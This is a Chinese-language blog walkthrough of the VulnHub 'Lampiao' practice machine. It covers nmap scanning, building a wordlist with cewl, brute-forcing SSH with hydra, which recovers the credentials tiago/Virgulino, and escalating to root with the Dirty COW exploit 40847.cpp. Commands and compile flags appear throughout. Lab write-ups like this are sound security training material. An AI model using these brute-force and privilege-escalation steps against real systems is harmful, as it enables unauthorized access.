首页 > 其他分享 >VulnHub-Lampiao-Walkthrough

VulnHub-Lampiao-Walkthrough

时间:2022-11-08 15:01:01浏览次数:59  
标签:提权 Lampiao 端口 192.168 Walkthrough 40847 VulnHub tiago nmap

nmap扫描内网存活主机

nmap -sP 192.168.32.0/24

我的靶机ip是192.168.32.135

扫描端口

nmap -sS -sV -A -p- 192.168.32.135

扫出来22、80、1898端口

这里对80网站源码没什么东西,22端口弱口令没有爆出来

看看1898端口

顺便看看链接

可以猜测还有第二个页面

应该是什么文件

有个语音,内容为:user tiago,则用户名为:tiago

那么我们可以尝试爆破ssh

cewl:通过爬行网站获取关键信息创建一个密码字典

cewl http://192.168.145.148:1898/?q=node/1 -w baji.txt

使用九头蛇开始爆破

hydra -l tiago -P baji.txt 192.168.32.135 ssh

已经爆破出来了

login: tiago   password: Virgulino

登录成功

权限只是用户

提权:

上面uname -a查看到了内核的版本

4.4.0-31-generic

网上查询内核提权

dirty(脏牛)进行提权

searchsploit dirty查找脏牛提权shell,利用40847.cpp

复制一份

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~

用python http发送到靶机

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

对文件进行编译

-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件,可直接提权。

直接运行文件

root密码出来了  dirtyCowFun

成功拿到falg

 

标签:提权,Lampiao,端口,192.168,Walkthrough,40847,VulnHub,tiago,nmap
From: https://www.cnblogs.com/me123/p/16869725.html

相关文章

  • Vulnhub Funbox2靶机解题详细过程
    Funbox2识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Funbox2]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.116.0/16|ScreenView:Unique......
  • VulnHub-GoldenEye-1-Walkthrough
    靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/下载成功过后使用虚拟机打开需要注意:靶机和kail的网络适配器需要一致,不然会扫描不出来,这里我使用的的nat模式......
  • Vulnhub Backdoored靶机解题过程
    Backdoored识别目标主机IP地址把目标主机导入VirtualBox后,发现KaliLinux扫描不到目标主机的IP地址,因此需要首先解决没有自动获得IP地址的问题,解决过程见【靶机攻略】相......
  • Vulnhub THM Containme靶机解题过程
    THMContainmev4识别目标主机IP地址VirtualBox中启动THMContainme靶机kaliLinux利用netdiscover识别其IP地址:┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]└─$......
  • Vulnhub NiveK靶机完整解题过程
    NiveK识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Nivek]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.98.0/16|ScreenView:UniqueHost......
  • Vulnhub Jerome靶机解题过程(未完成)
    Jerome识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Jerome]└─$sudonetdiscover-ieth1Currentlyscanning:172.16.95.0/16|ScreenView:UniqueHos......
  • Vulnhub Vulnerable Docker Containment靶机解题过程(部分,未完成)
    VulnerableDockerContainment识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.60.0/1......
  • Vulnhub Snakeoil靶机解题(过程非常麻烦,需要一直用burpsuite)
    Snakeoil识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/SnakeOil]└─$sudonetdiscover-iethCurrentlyscanning:192.168.122.0/16|ScreenView:UniqueHo......
  • 学习笔记-Bandit-WalkThrough
    Bandit-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.https://overthewire.org/wargames......
  • 学习笔记-PumpkinRaising-WalkThrough
    PumpkinRaising-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vu......